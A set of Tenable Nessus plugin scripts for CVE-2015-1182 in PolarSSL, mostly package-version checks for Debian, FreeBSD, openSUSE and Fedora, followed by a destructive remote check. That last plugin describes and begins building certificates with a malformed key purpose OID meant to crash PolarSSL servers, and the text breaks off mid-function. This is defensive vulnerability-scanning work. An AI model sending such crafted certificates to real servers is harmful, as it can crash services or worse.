Vulnerabilities > CVE-2015-1182

#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Debian Security Advisory DLA-144-1. The text
# itself is copyright (C) Software in the Public Interest, Inc.
#

include("compat.inc");

if (description)
{
  script_id(82127);
  script_version("1.3");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/03/12");

  script_cve_id("CVE-2015-1182");
  script_bugtraq_id(72306);

  script_name(english:"Debian DLA-144-1 : polarssl security update");
  script_summary(english:"Checks dpkg output for the updated packages.");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote Debian host is missing a security update."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"A vulnerability was discovered in PolarSSL, a lightweight crypto and
SSL/TLS library. A remote attacker could exploit this flaw using
specially crafted certificates to mount a denial of service against an
application linked against the library (application crash), or
potentially, to execute arbitrary code.

NOTE: Tenable Network Security has extracted the preceding description
block directly from the DLA security advisory. Tenable has attempted
to automatically clean and format it as much as possible without
introducing additional issues."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://lists.debian.org/debian-lts-announce/2015/01/msg00018.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://packages.debian.org/source/squeeze-lts/polarssl"
  );
  script_set_attribute(attribute:"solution", value:"Upgrade the affected packages.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:ND/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:libpolarssl-dev");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:libpolarssl-runtime");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:libpolarssl0");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:6.0");

  script_set_attribute(attribute:"patch_publication_date", value:"2015/01/29");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/03/26");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2015-2020 Tenable Network Security, Inc.");
  script_family(english:"Debian Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");

  exit(0);
}


include("audit.inc");
include("debian_package.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);


flag = 0;
if (deb_check(release:"6.0", prefix:"libpolarssl-dev", reference:"1.2.9-1~deb6u4")) flag++;
if (deb_check(release:"6.0", prefix:"libpolarssl-runtime", reference:"1.2.9-1~deb6u4")) flag++;
if (deb_check(release:"6.0", prefix:"libpolarssl0", reference:"1.2.9-1~deb6u4")) flag++;

if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());
  else security_hole(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");

#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were  
# extracted from the FreeBSD VuXML database :
#
# Copyright 2003-2018 Jacques Vidrine and contributors
#
# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,
# HTML, PDF, PostScript, RTF and so forth) with or without modification,
# are permitted provided that the following conditions are met:
# 1. Redistributions of source code (VuXML) must retain the above
#    copyright notice, this list of conditions and the following
#    disclaimer as the first lines of this file unmodified.
# 2. Redistributions in compiled form (transformed to other DTDs,
#    published online in any format, converted to PDF, PostScript,
#    RTF and other formats) must reproduce the above copyright
#    notice, this list of conditions and the following disclaimer
#    in the documentation and/or other materials provided with the
#    distribution.
# 
# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#

include("compat.inc");

if (description)
{
  script_id(80840);
  script_version("1.3");
  script_cvs_date("Date: 2018/11/10 11:49:44");

  script_cve_id("CVE-2015-1182");

  script_name(english:"FreeBSD : polarssl -- Remote attack using crafted certificates (a5856eba-a015-11e4-a680-1c6f65c3c4ff)");
  script_summary(english:"Checks for updated packages in pkg_info output");

  script_set_attribute(
    attribute:"synopsis", 
    value:
"The remote FreeBSD host is missing one or more security-related
updates."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"PolarSSL team reports :

During the parsing of a ASN.1 sequence, a pointer in the linked list
of asn1_sequence is not initialized by asn1_get_sequence_of(). In case
an error occurs during parsing of the list, a situation is created
where the uninitialized pointer is passed to polarssl_free().

This sequence can be triggered when a PolarSSL entity is parsing a
certificate. So practically this means clients when receiving a
certificate from the server or servers in case they are actively
asking for a client certificate."
  );
  # https://polarssl.org/tech-updates/security-advisories/polarssl-security-advisory-2014-04
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?8e6caee6"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.certifiedsecure.com/polarssl-advisory/"
  );
  # https://vuxml.freebsd.org/freebsd/a5856eba-a015-11e4-a680-1c6f65c3c4ff.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?635f69ac"
  );
  script_set_attribute(attribute:"solution", value:"Update the affected packages.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:polarssl");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:polarssl13");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd");

  script_set_attribute(attribute:"vuln_publication_date", value:"2015/01/14");
  script_set_attribute(attribute:"patch_publication_date", value:"2015/01/19");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/01/20");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"FreeBSD Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info");

  exit(0);
}


include("audit.inc");
include("freebsd_package.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/FreeBSD/release")) audit(AUDIT_OS_NOT, "FreeBSD");
if (!get_kb_item("Host/FreeBSD/pkg_info")) audit(AUDIT_PACKAGE_LIST_MISSING);


flag = 0;

if (pkg_test(save_report:TRUE, pkg:"polarssl>=1.2.0<1.2.12_1")) flag++;
if (pkg_test(save_report:TRUE, pkg:"polarssl13>=1.3.0<1.3.9_1")) flag++;

if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());
  else security_hole(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");

#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from openSUSE Security Update openSUSE-2015-88.
#
# The text description of this plugin is (C) SUSE LLC.
#

include("compat.inc");

if (description)
{
  script_id(81138);
  script_version("1.4");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04");

  script_cve_id("CVE-2015-1182");

  script_name(english:"openSUSE Security Update : polarssl (openSUSE-SU-2015:0186-1)");
  script_summary(english:"Check for the openSUSE-2015-88 patch");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote openSUSE host is missing a security update."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"polarssl was updated to fix a remote attack using crafted
certificates. (boo#913903, CVE-2015-1182)"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.opensuse.org/show_bug.cgi?id=913903"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://lists.opensuse.org/opensuse-updates/2015-02/msg00003.html"
  );
  script_set_attribute(
    attribute:"solution", 
    value:"Update the affected polarssl packages."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libpolarssl7");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libpolarssl7-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:polarssl-devel");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:13.2");

  script_set_attribute(attribute:"patch_publication_date", value:"2015/01/23");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/02/03");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"SuSE Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/SuSE/release");
if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE");
if (release !~ "^(SUSE13\.2)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "13.2", release);
if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

ourarch = get_kb_item("Host/cpu");
if (!ourarch) audit(AUDIT_UNKNOWN_ARCH);
if (ourarch !~ "^(i586|i686|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch);

flag = 0;

if ( rpm_check(release:"SUSE13.2", reference:"libpolarssl7-1.3.9-8.1") ) flag++;
if ( rpm_check(release:"SUSE13.2", reference:"libpolarssl7-debuginfo-1.3.9-8.1") ) flag++;
if ( rpm_check(release:"SUSE13.2", reference:"polarssl-devel-1.3.9-8.1") ) flag++;

if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "libpolarssl7 / libpolarssl7-debuginfo / polarssl-devel");
}

#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were  
# extracted from Fedora Security Advisory 2015-0991.
#

include("compat.inc");

if (description)
{
  script_id(81092);
  script_version("1.4");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04");

  script_cve_id("CVE-2015-1182");
  script_bugtraq_id(72306);
  script_xref(name:"FEDORA", value:"2015-0991");

  script_name(english:"Fedora 20 : polarssl-1.2.12-3.fc20 (2015-0991)");
  script_summary(english:"Checks rpm output for the updated package.");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote Fedora host is missing a security update."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"  - Fix for CVE-2015-1182

Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.redhat.com/show_bug.cgi?id=1184028"
  );
  # https://lists.fedoraproject.org/pipermail/package-announce/2015-January/148829.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?7206f0c4"
  );
  script_set_attribute(
    attribute:"solution", 
    value:"Update the affected polarssl package."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:ND/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:polarssl");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:20");

  script_set_attribute(attribute:"patch_publication_date", value:"2015/01/21");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/01/30");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2015-2020 Tenable Network Security, Inc.");
  script_family(english:"Fedora Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");
os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
os_ver = os_ver[1];
if (! ereg(pattern:"^20([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 20.x", "Fedora " + os_ver);

if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);

flag = 0;
if (rpm_check(release:"FC20", reference:"polarssl-1.2.12-3.fc20")) flag++;


if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "polarssl");
}

#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were  
# extracted from Fedora Security Advisory 2015-1045.
#

include("compat.inc");

if (description)
{
  script_id(81093);
  script_version("1.4");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04");

  script_cve_id("CVE-2015-1182");
  script_bugtraq_id(72306);
  script_xref(name:"FEDORA", value:"2015-1045");

  script_name(english:"Fedora 21 : polarssl-1.3.9-3.fc21 (2015-1045)");
  script_summary(english:"Checks rpm output for the updated package.");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote Fedora host is missing a security update."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"  - Fix for CVE-2015-1182

Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.redhat.com/show_bug.cgi?id=1184028"
  );
  # https://lists.fedoraproject.org/pipermail/package-announce/2015-January/148903.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?b6893f2a"
  );
  script_set_attribute(
    attribute:"solution", 
    value:"Update the affected polarssl package."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:ND/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:polarssl");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:21");

  script_set_attribute(attribute:"patch_publication_date", value:"2015/01/21");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/01/30");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2015-2020 Tenable Network Security, Inc.");
  script_family(english:"Fedora Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");
os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
os_ver = os_ver[1];
if (! ereg(pattern:"^21([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 21.x", "Fedora " + os_ver);

if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);

flag = 0;
if (rpm_check(release:"FC21", reference:"polarssl-1.3.9-3.fc21")) flag++;


if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "polarssl");
}

#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were  
# extracted from Debian Security Advisory DSA-3136. The text 
# itself is copyright (C) Software in the Public Interest, Inc.
#

include("compat.inc");

if (description)
{
  script_id(80971);
  script_version("1.5");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/03/12");

  script_cve_id("CVE-2015-1182");
  script_xref(name:"DSA", value:"3136");

  script_name(english:"Debian DSA-3136-1 : polarssl - security update");
  script_summary(english:"Checks dpkg output for the updated package");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote Debian host is missing a security-related update."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"A vulnerability was discovered in PolarSSL, a lightweight crypto and
SSL/TLS library. A remote attacker could exploit this flaw using
specially crafted certificates to mount a denial of service against an
application linked against the library (application crash), or
potentially, to execute arbitrary code."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=775776"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://packages.debian.org/source/wheezy/polarssl"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.debian.org/security/2015/dsa-3136"
  );
  script_set_attribute(
    attribute:"solution", 
    value:
"Upgrade the polarssl packages.

For the stable distribution (wheezy), this problem has been fixed in
version 1.2.9-1~deb7u5.

For the upcoming stable distribution (jessie) and the unstable
distribution (sid), this problem will be fixed soon."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:polarssl");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:7.0");

  script_set_attribute(attribute:"patch_publication_date", value:"2015/01/24");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/01/26");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Debian Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");

  exit(0);
}


include("audit.inc");
include("debian_package.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);


flag = 0;
if (deb_check(release:"7.0", prefix:"libpolarssl-dev", reference:"1.2.9-1~deb7u5")) flag++;
if (deb_check(release:"7.0", prefix:"libpolarssl-runtime", reference:"1.2.9-1~deb7u5")) flag++;
if (deb_check(release:"7.0", prefix:"libpolarssl0", reference:"1.2.9-1~deb7u5")) flag++;

if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());
  else security_hole(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");

#TRUSTED 0fe794bf7be9e0d52e7cf17daedeee2e8be472520a1571f540d5c1aba2d90c36c011877a8f737aae6dc94c6a4afa45e5af2ceea5dbe52fec6d218c62d6d9d9f91a6365bb9b460a6ac4139205fbcdce517f4d229fcc9315737c5b96d133ca8945a9e387f14d7cf4042b2812cf7191d0ef99f267f316c44b7d38ae2e37d126bcde494aace27b1328ead56f46eece686cbcac3d306f2b27155f59160cd2aa2f3932be6e06ca14d9715664a4baf427450b352ef1c99c70ed20a24ebf746bb74bf863f51390659517a670b5616bb3e897ed37174ef5b33be1450062d524d213893c7834aaecd9ef2f33b821a538a0dc6dd9fe238bbb4584d8523fe4ff00239c60d9f8f0448777154c34a74f210145357644bb8c4e4dc470561be288484792e4ec513c3a62d3f53c32205adfb6dc50f129fb63c88e6502c7e59a5a7be907c2cd9f104e59223671a3d17f7bc37e6f2272955bc90037434cbeab92ed4b8f46813ad571d135c02efac5066c5b2580849b89d6c356370a80047c07c6f6c4e94c990ad39e8889c541a80cc7f44bde9d00e47bd824504fa52a9f8f9f67d598e86a1feadefdd8d3f2bb2cdc91201af14b321efbbdbb6d2f4ff846a54a7697dda55da6d9dfb89f17282e532b57d0e8d400e94262bcae89433f7cf75854566343f0fac862bd91348caefc9dbe4221829552ac72820a24ca53360a6c20d15d32c27b9d9e6776827a
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(81047);
  script_version("1.13");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");

  script_cve_id("CVE-2015-1182");

  script_name(english:"PolarSSL 'asn1_get_sequence_of' Function Uninitialized Pointer RCE");
  script_summary(english:"Attempts to crash a PolarSSL-based SSL server.");

  script_set_attribute(attribute:"synopsis", value:
"The remote SSL server is vulnerable to remote code execution.");
  script_set_attribute(attribute:"description", value:
"PolarSSL contains a flaw when parsing ASN.1 sequences from X.509
certificates due to freeing an uninitialized pointer by the function
'asn1_get_sequence_of' within file 'asn1parse.c'. An unauthenticated,
remote attacker, using a specially crafted certificate, can exploit
this flaw to cause a denial of service or execute arbitrary code.

This plugin sends client certificates with an X.509 Extended Key Usage
extension that contains a malformed key purpose OID. PolarSSL
allocates a 'asn1_sequence' structure to store the OID. For this
plugin to work, the following conditions must be met :

  - (1) The 'next' field of the allocated 'asn_sequence'
    structure for the malformed key purpose OID must be
    non-zero.

  - (2) The SSL server requests a client certificate.");
  # https://polarssl.org/tech-updates/security-advisories/polarssl-security-advisory-2014-04
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?8e6caee6");
  script_set_attribute(attribute:"see_also", value:"https://www.certifiedsecure.com/polarssl-advisory/");
  script_set_attribute(attribute:"solution", value:
"Follow the instructions in the vendor advisory.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2015-1182");

  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");

  script_set_attribute(attribute:"vuln_publication_date", value:"2015/01/19");
  script_set_attribute(attribute:"patch_publication_date", value:"2015/01/19");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/01/28");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:polarssl:polarssl");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"General");

  script_copyright(english:"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("ssl_supported_ciphers.nasl");
  script_require_keys("SSL/Supported");
  script_timeout(1800);

  exit(0);
}

include("byte_func.inc");
include("ftp_func.inc");
include("global_settings.inc");
include("kerberos_func.inc");
include("ldap_func.inc");
include("misc_func.inc");
include("nntp_func.inc");
include("smtp_func.inc");
include("ssl_funcs.inc");
include("telnet2_func.inc");

##
#
# Create an X509 certificate extension
#
# @param oid extentions OID
# @param crit whether the extension is to be critical
# @param value extension value (DER-encoded)
# @return DER-encoded extension or NULL on error
# @remark
#
#   Extension  ::=  SEQUENCE  {
#        extnID      OBJECT IDENTIFIER,
#        critical    BOOLEAN DEFAULT FALSE,
#        extnValue   OCTET STRING
#                    -- contains the DER encoding of an ASN.1 value
#                    -- corresponding to the extension type identified
#                    -- by extnID
#        }
##
function x509_ext(oid, crit, value)
{
  local_var ext;

  oid = der_encode_oid(oid:oid);

  crit = der_encode(tag:0x01, data:raw_string(crit));

  value = der_encode_octet_string (string: value);

  if(isnull(oid) || isnull(crit) || isnull(value))
    return NULL;

  ext = oid + crit + value;

  ext = der_encode (tag:0x30, data:ext);

  return ext;
}

##
#
# Create a x509 certificate with an Extended Key Usage extension
#
# @param kp_cnt number of key purpose OIDs in the Extented Key Usage extension
# @param bad whether to append a malformed key purpose OID to the end of the
#            Extended Key Usage exension
# @return an x509 certificate
# @remark
#   - The output certificate type is RSA
#   - Most fields are hardcoded
#   - The certificate need not to be verifiable
#
##
function my_cert(kp_cnt,bad)
{
  local_var cert, issuer, serial, sig, sig_alg_id, version;
  local_var pubkey_info, subject, tbs, validity;
  local_var alg, exts, ext_eku, eku, i, kp, pubkey;

  # version         [0]  EXPLICIT Version DEFAULT v1,
  # Version  ::=  INTEGER  {  v1(0), v2(1), v3(2)  }
  version = der_encode(tag:2, data:raw_string(2));
  version = der_encode(tag:0xa0, data: version);

  # serialNumber         CertificateSerialNumber,
  # CertificateSerialNumber  ::=  INTEGER
  serial = raw_string(0x00, 0xba, 0xdc, 0xbb, 0xc3, 0xdb, 0x90, 0xdf);
  serial = der_encode(tag:2, data: serial);

  # signatureAlgorithm   AlgorithmIdentifier,
  #    AlgorithmIdentifier  ::=  SEQUENCE  {
  #            algorithm               OBJECT IDENTIFIER,
  #            parameters              ANY DEFINED BY algorithm OPTIONAL  }
  #
  #
  # PolarSSL (1.3.9) supports the following SignatureAlgorithmIdentifier (oid.c):
  #   md2WithRSAEncryption
  #   md4WithRSAEncryption
  #   md5WithRSAEncryption
  #   sha1WithRSAEncryption
  #   sha224WithRSAEncryption
  #   sha256WithRSAEncryption
  #   sha384WithRSAEncryption
  #   sha512WithRSAEncryption
  #   ecdsa-with-SHA1
  #   ecdsa-with-SHA224
  #   ecdsa-with-SHA256
  #   ecdsa-with-SHA384
  #   ecdsa-with-SHA512
  #   RSASSA-PSS
  #
  # use sha1WithRSAEncryption to cover more PolarSSL versions as
  # older versions may not support ecdsa-based SignatureAlgorithmIdentifier
  sig_alg_id = der_encode_oid(oid:"1.2.840.113549.1.1.5");
  sig_alg_id = der_encode(tag:0x30, data: sig_alg_id);

  # issuer               Name,
  #
  #   Name ::= CHOICE { -- only one possibility for now --
  #     rdnSequence  RDNSequence }
  #
  #   RDNSequence ::= SEQUENCE OF RelativeDistinguishedName
  #
  #   RelativeDistinguishedName ::=
  #     SET SIZE (1..MAX) OF AttributeTypeAndValue
  #
  #   AttributeTypeAndValue ::= SEQUENCE {
  #     type     AttributeType,
  #     value    AttributeValue }
  #
  #   AttributeType ::= OBJECT IDENTIFIER
  #
  #   AttributeValue ::= ANY -- DEFINED BY AttributeType
  #
  #   DirectoryString ::= CHOICE {
  #         teletexString           TeletexString (SIZE (1..MAX)),
  #         printableString         PrintableString (SIZE (1..MAX)),
  #         universalString         UniversalString (SIZE (1..MAX)),
  #         utf8String              UTF8String (SIZE (1..MAX)),
  #         bmpString               BMPString (SIZE (1..MAX)) }
  issuer = raw_string(
